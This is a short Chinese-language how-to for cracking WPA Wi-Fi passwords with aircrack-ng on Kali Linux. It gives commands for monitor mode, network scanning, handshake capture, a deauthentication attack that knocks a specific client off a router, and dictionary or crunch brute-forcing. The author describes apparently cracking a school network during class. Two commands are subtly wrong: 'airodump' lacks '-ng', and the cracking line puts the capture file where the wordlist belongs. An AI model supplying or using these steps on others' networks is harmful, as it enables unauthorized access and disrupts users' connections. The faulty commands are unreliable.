aircrack-ng暴力破解无线密码攻略

准备

kali下载：https://www.kali.org/downloads/

其实使用的aircrack-ng(对无线网进行渗透测试的工具，但是大神已经把很多安全渗透以及其他的黑客工具都预装在了linux系统中）

（笔记本的网卡在虚拟机中会被视为一般网卡，所以把kali系统直接装在你的电脑上。装的时候，会有探测装载光驱失败，把U盘拔了重新插上就可以了，很玄学)

（一般root用户直接输入文章中的命令就可以了。但是非root用户要在命令前加sudo，提升你的权限）

将无线网卡设置成监听模式

iwconfig

ifconfig wlan0 up

airmon-ng start wlan0

检测周围网络，获取你攻击的网络MAC地址，信道

airodump-ng wlan0mon

抓包，直到屏幕出现WPA handshake，数据才获取成功。

airodump --BSSID 要攻击的MAC -c 信道号（CH） -w 抓下来的包文件名 监听模式的网卡

你抓下来的包会根据你的抓取次数在文件名后面添加01 02 03等序号，使用的时候要注意。

使用aireplay发送一些流量给无线路由器，以至于能够捕获到数据。

aireplay-ng -0 1 –a FC:D7:33:3F:BC:F8 -c 08:ED:B9:89:FB:B1 wlan0mon

0 采用deauth攻击模式，后面跟上攻击次数，这里我设置为1，大家可以根据实际情况设置为10不等(0就不是不停的攻击)

a 后跟路由器的mac地址

c 后跟客户端的mac地址

我们破解的时候，是课间，老师电脑是关闭的，一直没有握手成功，然后上课老师进来打开了他的电脑（数据传输被获取到了），哈，立马就成功了。

利用包文件和密码字典进行破解

aircrack-ng -w 包文件 密码字典

密码字典一种是从网上找弱密码字典

crunch生成，如果是八位数字，生成的数据就已经很多了，我自己的电脑30多分钟才跑到08422144，很慢。